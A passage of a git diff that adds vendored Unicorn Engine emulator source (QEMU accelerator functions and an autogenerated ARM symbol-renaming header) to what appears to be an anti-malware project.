Returns NULL if not found */ +static AccelClass *accel_find(struct uc_struct *uc, const char *opt_name) +{ + char *class_name = g_strdup_printf(ACCEL_CLASS_NAME("%s"), opt_name); + AccelClass *ac = ACCEL_CLASS(uc, object_class_by_name(uc, class_name)); + g_free(class_name); + return ac; +} + +static int accel_init_machine(AccelClass *acc, MachineState *ms) +{ + ObjectClass *oc = OBJECT_CLASS(acc); + const char *cname = object_class_get_name(oc); + AccelState *accel = ACCEL(ms->uc, object_new(ms->uc, cname)); + int ret; + ms->accelerator = accel; + *(acc->allowed) = true; + ret = acc->init_machine(ms); + if (ret < 0) { + ms->accelerator = NULL; + *(acc->allowed) = false; + object_unref(ms->uc, OBJECT(accel)); + } + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h b/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h new file mode 100644 index 0000000..87d0203 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/arm.h @@ -0,0 +1,3021 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_ARM_H +#define UNICORN_AUTOGEN_ARM_H +#define arm_release arm_release_arm +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_arm +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_arm +#define use_idiv_instructions_rt use_idiv_instructions_rt_arm +#define tcg_target_deposit_valid tcg_target_deposit_valid_arm +#define helper_power_down helper_power_down_arm +#define check_exit_request check_exit_request_arm +#define address_space_unregister address_space_unregister_arm +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_arm +#define phys_mem_clean phys_mem_clean_arm +#define tb_cleanup tb_cleanup_arm +#define memory_map memory_map_arm +#define memory_map_ptr memory_map_ptr_arm +#define memory_unmap memory_unmap_arm +#define memory_free memory_free_arm +#define free_code_gen_buffer free_code_gen_buffer_arm +#define helper_raise_exception helper_raise_exception_arm +#define tcg_enabled 
tcg_enabled_arm +#define tcg_exec_init tcg_exec_init_arm +#define memory_register_types memory_register_types_arm +#define cpu_exec_init_all cpu_exec_init_all_arm +#define vm_start vm_start_arm +#define resume_all_vcpus resume_all_vcpus_arm +#define a15_l2ctlr_read a15_l2ctlr_read_arm +#define a64_translate_init a64_translate_init_arm +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_arm +#define aa64_cacheop_access aa64_cacheop_access_arm +#define aa64_daif_access aa64_daif_access_arm +#define aa64_daif_write aa64_daif_write_arm +#define aa64_dczid_read aa64_dczid_read_arm +#define aa64_fpcr_read aa64_fpcr_read_arm +#define aa64_fpcr_write aa64_fpcr_write_arm +#define aa64_fpsr_read aa64_fpsr_read_arm +#define aa64_fpsr_write aa64_fpsr_write_arm +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_arm +#define aa64_zva_access aa64_zva_access_arm +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_arm +#define aarch64_restore_sp aarch64_restore_sp_arm +#define aarch64_save_sp aarch64_save_sp_arm +#define accel_find accel_find_arm +#define accel_init_machine accel_init_machine_arm +#define accel_type accel_type_arm +#define access_with_adjusted_size access_with_adjusted_size_arm +#define add128 add128_arm +#define add16_sat add16_sat_arm +#define add16_usat add16_usat_arm +#define add192 add192_arm +#define add8_sat add8_sat_arm +#define add8_usat add8_usat_arm +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_arm +#define add_cpreg_to_list add_cpreg_to_list_arm +#define addFloat128Sigs addFloat128Sigs_arm +#define addFloat32Sigs addFloat32Sigs_arm +#define addFloat64Sigs addFloat64Sigs_arm +#define addFloatx80Sigs addFloatx80Sigs_arm +#define add_qemu_ldst_label add_qemu_ldst_label_arm +#define address_space_access_valid address_space_access_valid_arm +#define address_space_destroy address_space_destroy_arm +#define address_space_destroy_dispatch address_space_destroy_dispatch_arm +#define 
address_space_get_flatview address_space_get_flatview_arm +#define address_space_init address_space_init_arm +#define address_space_init_dispatch address_space_init_dispatch_arm +#define address_space_lookup_region address_space_lookup_region_arm +#define address_space_map address_space_map_arm +#define address_space_read address_space_read_arm +#define address_space_rw address_space_rw_arm +#define address_space_translate address_space_translate_arm +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_arm +#define address_space_translate_internal address_space_translate_internal_arm +#define address_space_unmap address_space_unmap_arm +#define address_space_update_topology address_space_update_topology_arm +#define address_space_update_topology_pass address_space_update_topology_pass_arm +#define address_space_write address_space_write_arm +#define addrrange_contains addrrange_contains_arm +#define addrrange_end addrrange_end_arm +#define addrrange_equal addrrange_equal_arm +#define addrrange_intersection addrrange_intersection_arm +#define addrrange_intersects addrrange_intersects_arm +#define addrrange_make addrrange_make_arm +#define adjust_endianness adjust_endianness_arm +#define all_helpers all_helpers_arm +#define alloc_code_gen_buffer alloc_code_gen_buffer_arm +#define alloc_entry alloc_entry_arm +#define always_true always_true_arm +#define arm1026_initfn arm1026_initfn_arm +#define arm1136_initfn arm1136_initfn_arm +#define arm1136_r2_initfn arm1136_r2_initfn_arm +#define arm1176_initfn arm1176_initfn_arm +#define arm11mpcore_initfn arm11mpcore_initfn_arm +#define arm926_initfn arm926_initfn_arm +#define arm946_initfn arm946_initfn_arm +#define arm_ccnt_enabled arm_ccnt_enabled_arm +#define arm_cp_read_zero arm_cp_read_zero_arm +#define arm_cp_reset_ignore arm_cp_reset_ignore_arm +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_arm +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_arm +#define arm_cpu_finalizefn 
arm_cpu_finalizefn_arm +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_arm +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_arm +#define arm_cpu_initfn arm_cpu_initfn_arm +#define arm_cpu_list arm_cpu_list_arm +#define cpu_loop_exit cpu_loop_exit_arm +#define arm_cpu_post_init arm_cpu_post_init_arm +#define arm_cpu_realizefn arm_cpu_realizefn_arm +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_arm +#define arm_cpu_register_types arm_cpu_register_types_arm +#define cpu_resume_from_signal cpu_resume_from_signal_arm +#define arm_cpus arm_cpus_arm +#define arm_cpu_set_pc arm_cpu_set_pc_arm +#define arm_cp_write_ignore arm_cp_write_ignore_arm +#define arm_current_el arm_current_el_arm +#define arm_dc_feature arm_dc_feature_arm +#define arm_debug_excp_handler arm_debug_excp_handler_arm +#define arm_debug_target_el arm_debug_target_el_arm +#define arm_el_is_aa64 arm_el_is_aa64_arm +#define arm_env_get_cpu arm_env_get_cpu_arm +#define arm_excp_target_el arm_excp_target_el_arm +#define arm_excp_unmasked arm_excp_unmasked_arm +#define arm_feature arm_feature_arm +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_arm +#define gen_intermediate_code gen_intermediate_code_arm +#define gen_intermediate_code_pc gen_intermediate_code_pc_arm +#define arm_gen_test_cc arm_gen_test_cc_arm +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_arm +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_arm +#define arm_handle_psci_call arm_handle_psci_call_arm +#define arm_is_psci_call arm_is_psci_call_arm +#define arm_is_secure arm_is_secure_arm +#define arm_is_secure_below_el3 arm_is_secure_below_el3_arm +#define arm_ldl_code arm_ldl_code_arm +#define arm_lduw_code arm_lduw_code_arm +#define arm_log_exception arm_log_exception_arm +#define arm_reg_read arm_reg_read_arm +#define arm_reg_reset arm_reg_reset_arm +#define arm_reg_write arm_reg_write_arm +#define restore_state_to_opc restore_state_to_opc_arm +#define 
arm_rmode_to_sf arm_rmode_to_sf_arm +#define arm_singlestep_active arm_singlestep_active_arm +#define tlb_fill tlb_fill_arm +#define tlb_flush tlb_flush_arm +#define tlb_flush_page tlb_flush_page_arm +#define tlb_set_page tlb_set_page_arm +#define arm_translate_init arm_translate_init_arm +#define arm_v7m_class_init arm_v7m_class_init_arm +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_arm +#define ats_access ats_access_arm +#define ats_write ats_write_arm +#define bad_mode_switch bad_mode_switch_arm +#define bank_number bank_number_arm +#define bitmap_zero_extend bitmap_zero_extend_arm +#define bp_wp_matches bp_wp_matches_arm +#define breakpoint_invalidate breakpoint_invalidate_arm +#define build_page_bitmap build_page_bitmap_arm +#define bus_add_child bus_add_child_arm +#define bus_class_init bus_class_init_arm +#define bus_info bus_info_arm +#define bus_unparent bus_unparent_arm +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_arm +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_arm +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_arm +#define call_recip_estimate call_recip_estimate_arm +#define can_merge can_merge_arm +#define capacity_increase capacity_increase_arm +#define ccsidr_read ccsidr_read_arm +#define check_ap check_ap_arm +#define check_breakpoints check_breakpoints_arm +#define check_watchpoints check_watchpoints_arm +#define cho cho_arm +#define clear_bit clear_bit_arm +#define clz32 clz32_arm +#define clz64 clz64_arm +#define cmp_flatrange_addr cmp_flatrange_addr_arm +#define code_gen_alloc code_gen_alloc_arm +#define commonNaNToFloat128 commonNaNToFloat128_arm +#define commonNaNToFloat16 commonNaNToFloat16_arm +#define commonNaNToFloat32 commonNaNToFloat32_arm +#define commonNaNToFloat64 commonNaNToFloat64_arm +#define commonNaNToFloatx80 commonNaNToFloatx80_arm +#define compute_abs_deadline compute_abs_deadline_arm +#define cond_name cond_name_arm +#define configure_accelerator 
configure_accelerator_arm +#define container_get container_get_arm +#define container_info container_info_arm +#define container_register_types container_register_types_arm +#define contextidr_write contextidr_write_arm +#define core_log_global_start core_log_global_start_arm +#define core_log_global_stop core_log_global_stop_arm +#define core_memory_listener core_memory_listener_arm +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_arm +#define cortex_a15_initfn cortex_a15_initfn_arm +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_arm +#define cortex_a8_initfn cortex_a8_initfn_arm +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_arm +#define cortex_a9_initfn cortex_a9_initfn_arm +#define cortex_m3_initfn cortex_m3_initfn_arm +#define count_cpreg count_cpreg_arm +#define countLeadingZeros32 countLeadingZeros32_arm +#define countLeadingZeros64 countLeadingZeros64_arm +#define cp_access_ok cp_access_ok_arm +#define cpacr_write cpacr_write_arm +#define cpreg_field_is_64bit cpreg_field_is_64bit_arm +#define cp_reginfo cp_reginfo_arm +#define cpreg_key_compare cpreg_key_compare_arm +#define cpreg_make_keylist cpreg_make_keylist_arm +#define cp_reg_reset cp_reg_reset_arm +#define cpreg_to_kvm_id cpreg_to_kvm_id_arm +#define cpsr_read cpsr_read_arm +#define cpsr_write cpsr_write_arm +#define cptype_valid cptype_valid_arm +#define cpu_abort cpu_abort_arm +#define cpu_arm_exec cpu_arm_exec_arm +#define cpu_arm_gen_code cpu_arm_gen_code_arm +#define cpu_arm_init cpu_arm_init_arm +#define cpu_breakpoint_insert cpu_breakpoint_insert_arm +#define cpu_breakpoint_remove cpu_breakpoint_remove_arm +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_arm +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_arm +#define cpu_can_do_io cpu_can_do_io_arm +#define cpu_can_run cpu_can_run_arm +#define cpu_class_init cpu_class_init_arm +#define cpu_common_class_by_name cpu_common_class_by_name_arm +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_arm 
+#define cpu_common_get_arch_id cpu_common_get_arch_id_arm +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_arm +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_arm +#define cpu_common_has_work cpu_common_has_work_arm +#define cpu_common_initfn cpu_common_initfn_arm +#define cpu_common_noop cpu_common_noop_arm +#define cpu_common_parse_features cpu_common_parse_features_arm +#define cpu_common_realizefn cpu_common_realizefn_arm +#define cpu_common_reset cpu_common_reset_arm +#define cpu_dump_statistics cpu_dump_statistics_arm +#define cpu_exec_init cpu_exec_init_arm +#define cpu_flush_icache_range cpu_flush_icache_range_arm +#define cpu_gen_init cpu_gen_init_arm +#define cpu_get_clock cpu_get_clock_arm +#define cpu_get_real_ticks cpu_get_real_ticks_arm +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_arm +#define cpu_handle_debug_exception cpu_handle_debug_exception_arm +#define cpu_handle_guest_debug cpu_handle_guest_debug_arm +#define cpu_inb cpu_inb_arm +#define cpu_inl cpu_inl_arm +#define cpu_interrupt cpu_interrupt_arm +#define cpu_interrupt_handler cpu_interrupt_handler_arm +#define cpu_inw cpu_inw_arm +#define cpu_io_recompile cpu_io_recompile_arm +#define cpu_is_stopped cpu_is_stopped_arm +#define cpu_ldl_code cpu_ldl_code_arm +#define cpu_ldub_code cpu_ldub_code_arm +#define cpu_lduw_code cpu_lduw_code_arm +#define cpu_memory_rw_debug cpu_memory_rw_debug_arm +#define cpu_mmu_index cpu_mmu_index_arm +#define cpu_outb cpu_outb_arm +#define cpu_outl cpu_outl_arm +#define cpu_outw cpu_outw_arm +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_arm +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_arm +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_arm +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_arm +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_arm +#define cpu_physical_memory_is_io 
cpu_physical_memory_is_io_arm +#define cpu_physical_memory_map cpu_physical_memory_map_arm +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_arm +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_arm +#define cpu_physical_memory_rw cpu_physical_memory_rw_arm +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_arm +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_arm +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_arm +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_arm +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_arm +#define cpu_register cpu_register_arm +#define cpu_register_types cpu_register_types_arm +#define cpu_restore_state cpu_restore_state_arm +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_arm +#define cpu_single_step cpu_single_step_arm +#define cpu_tb_exec cpu_tb_exec_arm +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_arm +#define cpu_to_be64 cpu_to_be64_arm +#define cpu_to_le32 cpu_to_le32_arm +#define cpu_to_le64 cpu_to_le64_arm +#define cpu_type_info cpu_type_info_arm +#define cpu_unassigned_access cpu_unassigned_access_arm +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_arm +#define cpu_watchpoint_insert cpu_watchpoint_insert_arm +#define cpu_watchpoint_remove cpu_watchpoint_remove_arm +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_arm +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_arm +#define crc32c_table crc32c_table_arm +#define create_new_memory_mapping create_new_memory_mapping_arm +#define csselr_write csselr_write_arm +#define cto32 cto32_arm +#define ctr_el0_access ctr_el0_access_arm +#define ctz32 ctz32_arm +#define ctz64 ctz64_arm +#define dacr_write dacr_write_arm +#define dbgbcr_write dbgbcr_write_arm +#define dbgbvr_write dbgbvr_write_arm +#define dbgwcr_write 
dbgwcr_write_arm +#define dbgwvr_write dbgwvr_write_arm +#define debug_cp_reginfo debug_cp_reginfo_arm +#define debug_frame debug_frame_arm +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_arm +#define define_arm_cp_regs define_arm_cp_regs_arm +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_arm +#define define_debug_regs define_debug_regs_arm +#define define_one_arm_cp_reg define_one_arm_cp_reg_arm +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_arm +#define deposit32 deposit32_arm +#define deposit64 deposit64_arm +#define deregister_tm_clones deregister_tm_clones_arm +#define device_class_base_init device_class_base_init_arm +#define device_class_init device_class_init_arm +#define device_finalize device_finalize_arm +#define device_get_realized device_get_realized_arm +#define device_initfn device_initfn_arm +#define device_post_init device_post_init_arm +#define device_reset device_reset_arm +#define device_set_realized device_set_realized_arm +#define device_type_info device_type_info_arm +#define disas_arm_insn disas_arm_insn_arm +#define disas_coproc_insn disas_coproc_insn_arm +#define disas_dsp_insn disas_dsp_insn_arm +#define disas_iwmmxt_insn disas_iwmmxt_insn_arm +#define disas_neon_data_insn disas_neon_data_insn_arm +#define disas_neon_ls_insn disas_neon_ls_insn_arm +#define disas_thumb2_insn disas_thumb2_insn_arm +#define disas_thumb_insn disas_thumb_insn_arm +#define disas_vfp_insn disas_vfp_insn_arm +#define disas_vfp_v8_insn disas_vfp_v8_insn_arm +#define do_arm_semihosting do_arm_semihosting_arm +#define do_clz16 do_clz16_arm +#define do_clz8 do_clz8_arm +#define do_constant_folding do_constant_folding_arm +#define do_constant_folding_2 do_constant_folding_2_arm +#define do_constant_folding_cond do_constant_folding_cond_arm +#define do_constant_folding_cond2 do_constant_folding_cond2_arm +#define do_constant_folding_cond_32 do_constant_folding_cond_32_arm +#define do_constant_folding_cond_64 
do_constant_folding_cond_64_arm +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_arm +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_arm +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_arm +#define do_ssat do_ssat_arm +#define do_usad do_usad_arm +#define do_usat do_usat_arm +#define do_v7m_exception_exit do_v7m_exception_exit_arm +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_arm +#define dummy_func dummy_func_arm +#define dummy_section dummy_section_arm +#define _DYNAMIC _DYNAMIC_arm +#define _edata _edata_arm +#define _end _end_arm +#define end_list end_list_arm +#define eq128 eq128_arm +#define ErrorClass_lookup ErrorClass_lookup_arm +#define error_copy error_copy_arm +#define error_exit error_exit_arm +#define error_get_class error_get_class_arm +#define error_get_pretty error_get_pretty_arm +#define error_setg_file_open error_setg_file_open_arm +#define estimateDiv128To64 estimateDiv128To64_arm +#define estimateSqrt32 estimateSqrt32_arm +#define excnames excnames_arm +#define excp_is_internal excp_is_internal_arm +#define extended_addresses_enabled extended_addresses_enabled_arm +#define extended_mpu_ap_bits extended_mpu_ap_bits_arm +#define extract32 extract32_arm +#define extract64 extract64_arm +#define extractFloat128Exp extractFloat128Exp_arm +#define extractFloat128Frac0 extractFloat128Frac0_arm +#define extractFloat128Frac1 extractFloat128Frac1_arm +#define extractFloat128Sign extractFloat128Sign_arm +#define extractFloat16Exp extractFloat16Exp_arm +#define extractFloat16Frac extractFloat16Frac_arm +#define extractFloat16Sign extractFloat16Sign_arm +#define extractFloat32Exp extractFloat32Exp_arm +#define extractFloat32Frac extractFloat32Frac_arm +#define extractFloat32Sign extractFloat32Sign_arm +#define extractFloat64Exp extractFloat64Exp_arm +#define extractFloat64Frac extractFloat64Frac_arm +#define extractFloat64Sign extractFloat64Sign_arm +#define extractFloatx80Exp extractFloatx80Exp_arm +#define extractFloatx80Frac 
extractFloatx80Frac_arm +#define extractFloatx80Sign extractFloatx80Sign_arm +#define fcse_write fcse_write_arm +#define find_better_copy find_better_copy_arm +#define find_default_machine find_default_machine_arm +#define find_desc_by_name find_desc_by_name_arm +#define find_first_bit find_first_bit_arm +#define find_paging_enabled_cpu find_paging_enabled_cpu_arm +#define find_ram_block find_ram_block_arm +#define find_ram_offset find_ram_offset_arm +#define find_string find_string_arm +#define find_type find_type_arm +#define _fini _fini_arm +#define flatrange_equal flatrange_equal_arm +#define flatview_destroy flatview_destroy_arm +#define flatview_init flatview_init_arm +#define flatview_insert flatview_insert_arm +#define flatview_lookup flatview_lookup_arm +#define flatview_ref flatview_ref_arm +#define flatview_simplify flatview_simplify_arm +#define flatview_unref flatview_unref_arm +#define float128_add float128_add_arm +#define float128_compare float128_compare_arm +#define float128_compare_internal float128_compare_internal_arm +#define float128_compare_quiet float128_compare_quiet_arm +#define float128_default_nan float128_default_nan_arm +#define float128_div float128_div_arm +#define float128_eq float128_eq_arm +#define float128_eq_quiet float128_eq_quiet_arm +#define float128_is_quiet_nan float128_is_quiet_nan_arm +#define float128_is_signaling_nan float128_is_signaling_nan_arm +#define float128_le float128_le_arm +#define float128_le_quiet float128_le_quiet_arm +#define float128_lt float128_lt_arm +#define float128_lt_quiet float128_lt_quiet_arm +#define float128_maybe_silence_nan float128_maybe_silence_nan_arm +#define float128_mul float128_mul_arm +#define float128_rem float128_rem_arm +#define float128_round_to_int float128_round_to_int_arm +#define float128_scalbn float128_scalbn_arm +#define float128_sqrt float128_sqrt_arm +#define float128_sub float128_sub_arm +#define float128ToCommonNaN float128ToCommonNaN_arm +#define float128_to_float32 
float128_to_float32_arm +#define float128_to_float64 float128_to_float64_arm +#define float128_to_floatx80 float128_to_floatx80_arm +#define float128_to_int32 float128_to_int32_arm +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_arm +#define float128_to_int64 float128_to_int64_arm +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_arm +#define float128_unordered float128_unordered_arm +#define float128_unordered_quiet float128_unordered_quiet_arm +#define float16_default_nan float16_default_nan_arm +#define float16_is_quiet_nan float16_is_quiet_nan_arm +#define float16_is_signaling_nan float16_is_signaling_nan_arm +#define float16_maybe_silence_nan float16_maybe_silence_nan_arm +#define float16ToCommonNaN float16ToCommonNaN_arm +#define float16_to_float32 float16_to_float32_arm +#define float16_to_float64 float16_to_float64_arm +#define float32_abs float32_abs_arm +#define float32_add float32_add_arm +#define float32_chs float32_chs_arm +#define float32_compare float32_compare_arm +#define float32_compare_internal float32_compare_internal_arm +#define float32_compare_quiet float32_compare_quiet_arm +#define float32_default_nan float32_default_nan_arm +#define float32_div float32_div_arm +#define float32_eq float32_eq_arm +#define float32_eq_quiet float32_eq_quiet_arm +#define float32_exp2 float32_exp2_arm +#define float32_exp2_coefficients float32_exp2_coefficients_arm +#define float32_is_any_nan float32_is_any_nan_arm +#define float32_is_infinity float32_is_infinity_arm +#define float32_is_neg float32_is_neg_arm +#define float32_is_quiet_nan float32_is_quiet_nan_arm +#define float32_is_signaling_nan float32_is_signaling_nan_arm +#define float32_is_zero float32_is_zero_arm +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_arm +#define float32_le float32_le_arm +#define float32_le_quiet float32_le_quiet_arm +#define float32_log2 float32_log2_arm +#define float32_lt float32_lt_arm +#define float32_lt_quiet 
float32_lt_quiet_arm +#define float32_max float32_max_arm +#define float32_maxnum float32_maxnum_arm +#define float32_maxnummag float32_maxnummag_arm +#define float32_maybe_silence_nan float32_maybe_silence_nan_arm +#define float32_min float32_min_arm +#define float32_minmax float32_minmax_arm +#define float32_minnum float32_minnum_arm +#define float32_minnummag float32_minnummag_arm +#define float32_mul float32_mul_arm +#define float32_muladd float32_muladd_arm +#define float32_rem float32_rem_arm +#define float32_round_to_int float32_round_to_int_arm +#define float32_scalbn float32_scalbn_arm +#define float32_set_sign float32_set_sign_arm +#define float32_sqrt float32_sqrt_arm +#define float32_squash_input_denormal float32_squash_input_denormal_arm +#define float32_sub float32_sub_arm +#define float32ToCommonNaN float32ToCommonNaN_arm +#define float32_to_float128 float32_to_float128_arm +#define float32_to_float16 float32_to_float16_arm +#define float32_to_float64 float32_to_float64_arm +#define float32_to_floatx80 float32_to_floatx80_arm +#define float32_to_int16 float32_to_int16_arm +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_arm +#define float32_to_int32 float32_to_int32_arm +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_arm +#define float32_to_int64 float32_to_int64_arm +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_arm +#define float32_to_uint16 float32_to_uint16_arm +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_arm +#define float32_to_uint32 float32_to_uint32_arm +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_arm +#define float32_to_uint64 float32_to_uint64_arm +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_arm +#define float32_unordered float32_unordered_arm +#define float32_unordered_quiet float32_unordered_quiet_arm +#define float64_abs float64_abs_arm +#define float64_add float64_add_arm +#define 
float64_chs float64_chs_arm +#define float64_compare float64_compare_arm +#define float64_compare_internal float64_compare_internal_arm +#define float64_compare_quiet float64_compare_quiet_arm +#define float64_default_nan float64_default_nan_arm +#define float64_div float64_div_arm +#define float64_eq float64_eq_arm +#define float64_eq_quiet float64_eq_quiet_arm +#define float64_is_any_nan float64_is_any_nan_arm +#define float64_is_infinity float64_is_infinity_arm +#define float64_is_neg float64_is_neg_arm +#define float64_is_quiet_nan float64_is_quiet_nan_arm +#define float64_is_signaling_nan float64_is_signaling_nan_arm +#define float64_is_zero float64_is_zero_arm +#define float64_le float64_le_arm +#define float64_le_quiet float64_le_quiet_arm +#define float64_log2 float64_log2_arm +#define float64_lt float64_lt_arm +#define float64_lt_quiet float64_lt_quiet_arm +#define float64_max float64_max_arm +#define float64_maxnum float64_maxnum_arm +#define float64_maxnummag float64_maxnummag_arm +#define float64_maybe_silence_nan float64_maybe_silence_nan_arm +#define float64_min float64_min_arm +#define float64_minmax float64_minmax_arm +#define float64_minnum float64_minnum_arm +#define float64_minnummag float64_minnummag_arm +#define float64_mul float64_mul_arm +#define float64_muladd float64_muladd_arm +#define float64_rem float64_rem_arm +#define float64_round_to_int float64_round_to_int_arm +#define float64_scalbn float64_scalbn_arm +#define float64_set_sign float64_set_sign_arm +#define float64_sqrt float64_sqrt_arm +#define float64_squash_input_denormal float64_squash_input_denormal_arm +#define float64_sub float64_sub_arm +#define float64ToCommonNaN float64ToCommonNaN_arm +#define float64_to_float128 float64_to_float128_arm +#define float64_to_float16 float64_to_float16_arm +#define float64_to_float32 float64_to_float32_arm +#define float64_to_floatx80 float64_to_floatx80_arm +#define float64_to_int16 float64_to_int16_arm +#define 
float64_to_int16_round_to_zero float64_to_int16_round_to_zero_arm +#define float64_to_int32 float64_to_int32_arm +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_arm +#define float64_to_int64 float64_to_int64_arm +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_arm +#define float64_to_uint16 float64_to_uint16_arm +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_arm +#define float64_to_uint32 float64_to_uint32_arm +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_arm +#define float64_to_uint64 float64_to_uint64_arm +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_arm +#define float64_trunc_to_int float64_trunc_to_int_arm +#define float64_unordered float64_unordered_arm +#define float64_unordered_quiet float64_unordered_quiet_arm +#define float_raise float_raise_arm +#define floatx80_add floatx80_add_arm +#define floatx80_compare floatx80_compare_arm +#define floatx80_compare_internal floatx80_compare_internal_arm +#define floatx80_compare_quiet floatx80_compare_quiet_arm +#define floatx80_default_nan floatx80_default_nan_arm +#define floatx80_div floatx80_div_arm +#define floatx80_eq floatx80_eq_arm +#define floatx80_eq_quiet floatx80_eq_quiet_arm +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_arm +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_arm +#define floatx80_le floatx80_le_arm +#define floatx80_le_quiet floatx80_le_quiet_arm +#define floatx80_lt floatx80_lt_arm +#define floatx80_lt_quiet floatx80_lt_quiet_arm +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_arm +#define floatx80_mul floatx80_mul_arm +#define floatx80_rem floatx80_rem_arm +#define floatx80_round_to_int floatx80_round_to_int_arm +#define floatx80_scalbn floatx80_scalbn_arm +#define floatx80_sqrt floatx80_sqrt_arm +#define floatx80_sub floatx80_sub_arm +#define floatx80ToCommonNaN floatx80ToCommonNaN_arm +#define floatx80_to_float128 
floatx80_to_float128_arm +#define floatx80_to_float32 floatx80_to_float32_arm +#define floatx80_to_float64 floatx80_to_float64_arm +#define floatx80_to_int32 floatx80_to_int32_arm +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_arm +#define floatx80_to_int64 floatx80_to_int64_arm +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_arm +#define floatx80_unordered floatx80_unordered_arm +#define floatx80_unordered_quiet floatx80_unordered_quiet_arm +#define flush_icache_range flush_icache_range_arm +#define format_string format_string_arm +#define fp_decode_rm fp_decode_rm_arm +#define frame_dummy frame_dummy_arm +#define free_range free_range_arm +#define fstat64 fstat64_arm +#define futex_wait futex_wait_arm +#define futex_wake futex_wake_arm +#define gen_aa32_ld16s gen_aa32_ld16s_arm +#define gen_aa32_ld16u gen_aa32_ld16u_arm +#define gen_aa32_ld32u gen_aa32_ld32u_arm +#define gen_aa32_ld64 gen_aa32_ld64_arm +#define gen_aa32_ld8s gen_aa32_ld8s_arm +#define gen_aa32_ld8u gen_aa32_ld8u_arm +#define gen_aa32_st16 gen_aa32_st16_arm +#define gen_aa32_st32 gen_aa32_st32_arm +#define gen_aa32_st64 gen_aa32_st64_arm +#define gen_aa32_st8 gen_aa32_st8_arm +#define gen_adc gen_adc_arm +#define gen_adc_CC gen_adc_CC_arm +#define gen_add16 gen_add16_arm +#define gen_add_carry gen_add_carry_arm +#define gen_add_CC gen_add_CC_arm +#define gen_add_datah_offset gen_add_datah_offset_arm +#define gen_add_data_offset gen_add_data_offset_arm +#define gen_addq gen_addq_arm +#define gen_addq_lo gen_addq_lo_arm +#define gen_addq_msw gen_addq_msw_arm +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_arm +#define gen_arm_shift_im gen_arm_shift_im_arm +#define 